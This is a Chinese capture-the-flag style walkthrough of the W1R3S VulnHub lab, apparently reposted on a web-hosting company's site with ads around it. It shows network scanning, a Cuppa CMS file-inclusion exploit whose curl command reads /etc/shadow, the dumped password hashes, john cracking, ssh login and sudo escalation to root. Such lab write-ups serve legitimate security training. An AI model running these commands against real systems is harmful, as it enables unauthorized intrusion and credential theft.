W1R3S-VulnHub(漏洞靶机渗透测试)-创新互联

靶机地址:https://www.vulnhub.com/entry/w1r3s-101,220/
下载地址:https://download.vulnhub.com/w1r3s/w1r3s.v1.0.1.zip

“只有客户发展了,才有我们的生存与发展!”这是成都创新互联的服务宗旨!把网站当作互联网产品,产品思维更注重全局思维、需求分析和迭代思维,在网站建设中就是为了建设一个不仅审美在线,而且实用性极高的网站。创新互联对做网站、成都网站设计、网站制作、网站开发、网页设计、网站优化、网络推广、探索永无止境。

确定靶机网段
ip a
image.png
确定靶机IP(扫描C段/B段,此时为校园网)->10.170.19.36
sudo nmap -sn 10.170.0.0/16sudo netdiscover -i eth0 -r 10.170.0.0/16
image.png
全面探测端口(建议至少扫两遍)(kali中扫描小于1024端口的操作需要系统权限)
可以用以下命令(-sS:半开扫描需要root权限;-n:不做DNS解析(快速扫描);-p-:所有端口;--max-retries=0:重传设定为0,速度更快,可能会丢失部分数据;-Pn:非ping扫描,不执行主机发现,可以跳过防火墙。
sudo nmap -n -v -sS -p- 10.170.19.36 --min-rate=10000 --max-retries=0 -oN allports.txt -Pn
查看打印的报告allports.txt
image.png
再调用默认插件对打印出的报告里的端口进行扫描,grep ^[0-9]正则匹配数字开头;cut -d / -f1指以/分割,取第一部分,如21/tcp取21;tr '\n' ','换行换成,;sed s/,$//将结尾的,替换为空。
nmap -n -v -sC -sV -p $(cat allports.txt | grep ^[0-9] |cut -d / -f1 | tr '\n' ',' | sed s/,$//) 10.170.19.36 -oN nmap.txt -Pn
image.png
按照一定的顺序来逐个排查端口:如21 ->80 ->3306 ->22

检查21端口
尝试匿名登陆
ftp 10.170.19.36
image.png
查看当前目录
dir/ls
image.png
依次cd进目录,mget(多个文件)/get(单个文件),下载里面的文件,bye退出
注:下载前,输入binary命令( Binary模式不会对数据进行任何处理;Ascii模式会将回车换行转换为本机的回车字符),防止传输后的文件被破坏
ls -lt按照时间查看下载到本地的文件
image.png
cat -n *.txt打开所有文件查看
01ec2d8fc11c493b25029fb1f47f39ce->明显是MD5,可以用hash-identifier识别一下
image.png
拿去hashes.com解密
01ec2d8fc11c493b25029fb1f47f39ce:This is not a password
另一条是
SXQgaXMgZWFzeSwgYnV0IG5vdCB0aGF0IGVhc3kuLg==->base 64
SXQgaXMgZWFzeSwgYnV0IG5vdCB0aGF0IGVhc3kuLg==:It is easy, but not that easy..
都没什么用
还有一些员工信息,包括姓名、职位,可以用来构造字典,
image.png
其他的一些信息,看起来是顺序颠倒的,肉眼能看出其是上下左右颠倒,大概能读出意思
image.png
去搜一下关于颠倒文本的网站,解密一下
第一句是filp
image.png
第二句是flip+ reverse

image.png
都没啥用,花费了不少时间在ftp上面,接下来换一种方式

检查80端口
先上目录扫描工具
第一种工具:gobuster
sudo gobuster dir -w /usr/share/wordlists/dirb/big.txt -u http://10.170.19.36/
image.png
包括/administrator/javascript/wordpress
第二种工具:feroxbuster,可以扫多级目录
image.png
进入http://10.170.19.36/administrator跳转到/administrator/installation/
标题显示为Cuppa CMS
image.png
搜索有没有Cuppa CMS的漏洞可以利用
searchsploit cuppa cms
image.png
下载该文件
searchsploit cuppa cms -m 25971
查看该文件,是PHP代码注入,其中urlConfig参数有文件包含漏洞
image.png
利用的实例如下
image.png
看到feroxbuster扫出二级目录/administrator/alerts,根据样例,这里我们构造http://10.170.19.36/administrator/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd
但是以GET方式直接访问显示不全
image.png
尝试以POST方式访问
image.png
还可以用curl post数据访问,这里尝试访问shadow文件,将结果存入到hash文件中
curl --data urlConfig=../../../../../../../../../etc/shadow http://10.170.19.36/administrator/alerts/alertConfigField.php -o hash
得到3个账号密码,开始的 6 6 6位为加密标志,后面8位为salt,后面的为hash
($6开头表示是SHA-512加密,$1是MD5,$5是SHA-256)
root:$6$vYcecPCy$JNbK.hr7HU72ifLxmjpIP9kTcx./ak2MM3lBs.Ouiu0mENav72TfQIs8h1jPm2rwRFqd87HDC0pi7gn9t7VgZ0:17554:0:99999:7:::
www-data:$6$8JMxE7l0$yQ16jM..ZsFxpoGue8/0LBUnTas23zaOqg2Da47vmykGTANfutzM8MuFidtb0..Zk.TUKDoDAVRCoXiZAH.Ud1:17560:0:99999:7:::
w1r3s:$6$xe/eyoTx$gttdIYrxrstpJP97hWqttvc5cGzDNyMb0vSuppux4f2CcBv3FwOt2P1GFLjZdNqjwRuP3eUjkgb/io7x9q1iP.:17567:0:99999:7:::
使用john破解hash
john hash
image.png

拿到密码,尝试ssh连接
ssh w1r3s@10.170.19.36
然后执行sudo -l,看到下面的(ALL : ALL) ALL,表明该用户可以执行任何指令
image.png
执行sudo su -,直接来到root主目录,拿到flag
image.png

1670244109857)]
执行sudo su -,直接来到root主目录,拿到flag
[外链图片转存中…(img-fZownBFc-1670244109857)]

你是否还在寻找稳定的海外服务器提供商?创新互联www.cdcxhl.cn海外机房具备T级流量清洗系统配攻击溯源,准确流量调度确保服务器高可用性,企业级服务器适合批量采购,新人活动首月15元起,快前往官网查看详情吧


网站题目:W1R3S-VulnHub(漏洞靶机渗透测试)-创新互联
转载来源:http://pwwzsj.com/article/iepod.html